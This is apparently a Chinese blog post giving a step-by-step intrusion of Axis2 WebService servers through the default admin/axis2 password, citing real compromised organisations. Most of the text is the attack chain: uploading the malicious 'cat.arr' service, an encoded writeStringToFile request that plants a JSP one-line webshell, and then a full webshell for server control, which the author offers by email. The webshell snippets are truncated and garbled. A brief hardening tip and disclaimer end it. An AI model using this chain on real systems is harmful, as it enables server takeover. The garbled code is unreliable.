利用Axis2默认口令安全漏洞可入侵WebService网站

最新推荐文章于 2024-05-09 16:24:50 发布
最新推荐文章于 2024-05-09 16:24:50 发布
阅读量2k 收藏 1
点赞数
文章标签: java php
利用 Axis2默认口令安全漏洞可入侵WebService网站

近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。

乌云Axis2默认口令安全弱点利用案例:

航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)

乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)

中国科学院网Web-services(axis2)系统任意代码执行

工具准备:

Axis2利用工具包: cat.arr

cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548

JSP一句话木马

服务器端一句话木马代码:

<%if(request.getparameter(“f”)!=null)(new>

<%if(request.getparameter(“f”)!=null)(new>

客户端提交代码:

jsp?f=大木马.jsp”" method="”post”"> your code

 

 

JSP大马

大马我就不发布出来了,如有需要可发我QQ邮箱2749958485@qq.com索要。

 

URL编码工具

我用的是小葵转码,也可以利用网上在线的转码工具

 

渗透流程:

第一步,确认目标WebService网站后台URL地址。

我在本地搭建的后台地址为 http://10.10.10.138:8080/axis2/axis2-admin/ , 按照webservice的部署经验,直接部署在根目录下的网站也比较多,则后台地址多为 http://*.*.*:8080/axis2-web/ 。点击Administration 进入Axis2后台登录界面,输入默认口令admin/axis2,若口令没有被更改则可成功进入后台管理界面。wKioL1bWtLyQRfLlAAH3i3n3zwQ584.jpg

wKiom1bWtN-y-PLAAAHhXk1sCvQ506.jpg

wKiom1bWtbGB2DZgAALNV1eXEuY737.jpg第二步,点击左侧“Upload Service”上传cat.arr,这个arr包实际上是个中马,我们主要利用这个网马的获取web应用路径、写入文件这两个功能。

cat工具上传成功之后,点击左侧“Available Service”可以看到上传的service项“Cat”。

在客户端利用这个网马的getClassPath功能获取当前应用路径

http://10.10.10.137:8080/axis2/services/Cat/getClassPath

wKiom1bWvVSTrEPSAAFMaaNWPTU920.jpg利用文件写入功能往获取的web应用路径下写入服务器端JSP一句话木马,注意此处需要将一句话木马代码先转码成URL编码,另外在URL中添加内容的时候注意不准换行,复制黏贴时要特别注意。

http://10.10.10.137:8080/axis2/services/Cat/writeStringToFile?data=%253C%25if%28request.getParameter%28%25E2%2580%259Cf%25E2%2580%259D%29!%3Dnull%29%28new%2520java.io.Fil&file=/C:/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/webapps/axis2/1.jsp&encoding=utf-8&append=false

wKiom1bWvrTRTP-wAAElw4UtVK0568.jpg

第三步,利用JSP一句话木马的客户端提交代码写入JSP大马。在提交表单中填入JSP大马代码,点击提交即可。此处注意自行修改客户端提交代码中的JSP一句话木马文件路径以及要写入的JSP大马文件名。

 

wKiom1bWv87BVXSBAADq9h42qiE546.jpg第四步,访问上传的大马,即可获得web应用服务器控制权限。

 

wKiom1bWwaejpBGDAAPV62V2aZE162.jpg

 

安全加固方法:

修改Axis2默认账户名与口令,具体位置在axis2中的conf.xml文档中,修改如下两行代码。

admin

axis2

 

【后记】:写本篇文章主要是想说明Axis2默认账户口令的危害,希望大家不要滥用文章中涉及到的渗透技术,共同建立一个良好的信息安全环境。

csid_502
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asix2,xFire,cxf优缺点
04-02
asix2,xFire,cxf三种常见webServer工具类进行了比较,通过对比学习能更深刻的掌握webServer技术
带有安全机制的axis2实现方式(一)
hwmm2010的专栏
12-03 587
服务端 1、所需文件 service.jks,放在src下面(与client.jks是一对,具体生成方式可上网查询) services.xml      server of  receiveMessage  ------服务描述信息          com.test.ReceiveMessageServer  -------服务类,连带包结构          org
网络安全最全Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞(1),2024年最新你连原理都还没弄明白
最新发布
2401_84302761的博客
05-09 526
中找到 lib/resty/jwt.lua 文件,在 jwt.lua 文件的 782 行中,可以看到有个 jwt_obj.reason 中包含了 secret,这里代码的意思是说,如果程序执行正常就返回 secret 的值,否则就返回具体的异常信息。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
Axis的安全访问机制
12-05
J2EE Web 服务中的Handler技术特点非常像Servlet技术中的Filter Web服务中的Handler通常也提供一下的功能: 对客户端进行认证、授权; 把用户的访问写入系统日志; 对请求的SOAP消息进行加密,解密; 为Web Services对象做缓存。
axis2集成安全和jibx
qingwei201314
10-08 99
1.先写服务类,内容如下: public class StockQuoteService {    private HashMap map = new HashMap();     public Man getPrice(String symbol) {        Double price = (Double) map.get(symbol);        Man man = new M...
带有安全机制的axis2实现方式(三)
hwmm2010的专栏
12-03 629
前面写了带有安全机制的axis2的服务端和客户端的实现方式,这里把实现带有安全机制的axis2所需jar包列出来,不包括spring和其他jar,只是axis2所需的jar: axis2-adb-1.4.1.jar axis2-adb-codegen-1.4.1.jar axis2-codegen-1.4.1.jar axis2-corba-1.4.1.jar axis2-fastinf
建立安全的AXIS服务
wuyisky
07-28 117
建立安全的AXIS服务在前面的文章中,我们实现了最简单的AXIS服务。现在我们一起来讨论一下Web服务的安全问题。根据应用的对安全要求的级别不同,可以采用不同的方式来实现安全性,以下是目前最常用的一些实现方式(从低到高排列):1、J2EEWeb应用默认的访问控制(数据是明文的);2、使用axis的Handler进行访问控制(数据是明文的);3、使用Servlet过滤器(Filter)进行访问控制(...
axis2弱密码漏洞复现
信安是不可或缺的一部分!
12-30 4381
介绍 Axis2 Web 管理模块是一个下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 环境介绍 主机
利用AXIS开发Webservice教程.doc
08-12
本文将深入讲解如何利用AXIS 1.4版本创建和发布Web服务,重点在于定制发布,因为即时发布虽然简单,但在实际开发中可能无法满足复杂需求。 首先,确保你已准备好了必要的开发环境,包括JDK 1.4.2、Myeclipse 6.0、...
axis2-WebService-开发指南.docx
08-12
Axis2 是一个基于 Java 的开源 WebService 框架,具有高效、灵活、可扩展等特点。以下是对 Axis2 WebService 开发指南的知识点总结: 1. 环境准备: Axis2 的开发需要下载相关的 jar 包和 Eclipse 插件工具,可以...
axis2组件漏洞问题
08-01
推荐版本1.7.5
Axis2(WebService)经典教程.doc
08-12
Axis2 WebService 经典教程】 Axis2是Apache组织开发的一个先进的Web Service引擎,它在Web服务领域中扮演着重要角色。Web Service是一种允许不同应用程序之间进行交互的技术,无论这些应用程序是用何种编程语言...
webservice-axis2客户端调用(多参).txt
07-08
之前webservice客户端调用,使用RPC客戶端接口调用方法,但发现此种调用方式针对携参方式并不适用。最后经过多种方式测试选择了OMFactory......调用。经测试好用
带有安全机制的axis2实现方式(二)
hwmm2010的专栏
12-03 502
客户端 1、所需文件 client.jks,放在工程的src下   (与service.jks是一对,具体生成方法可上网查询)  2、客户端生成方式 从apache官方网站上下载 axis2-1.4.1-bin.zip(如果所用的jar包是1.6的也行),然后解压缩,打开dos命令输入窗口(在运行中输入 cmd  ,然后回车即可),从窗口进入到解压缩的文件中,具体到bin目录下,例如:F:
Axis的安全模块Rampart
金溪的博客
10-09 648
Apache Rampart是Axis2的安全模块,用来为Axis2 Web服务提供认证、集成、保密等功能,实现了WS-Security协议堆栈。rampart基于wss4j来完成安全相关的任务,因为rampart是基于handler模式的,是对handler的一种封装,它很像一个拦截器。 axis2+rampart的配置(原砖搬,没有实践) 1.下载rampart(http://axis.a...
Axis2口令 getshell 漏洞复现
Azjj
01-05 2224
Axis2 Axis2是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中 默认后台:http://ip:p
一次真实axis2渗透测试
systemino的博客
08-04 1165
一 前言 最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下 二 信息收集 首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。 通过目录扫描发现一些有用的信息 第一 axis2构建的webservice 第二 axis2的后台登录地址(/axis2/axis2-admin/)存在 google axis2漏洞,发现多半都是默认口令...
WebServiceAxis2 Log4j 2.x 漏洞升级教程
一个标题
01-12 1579
Axis2 Log4j 2.x 漏洞升级教程

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值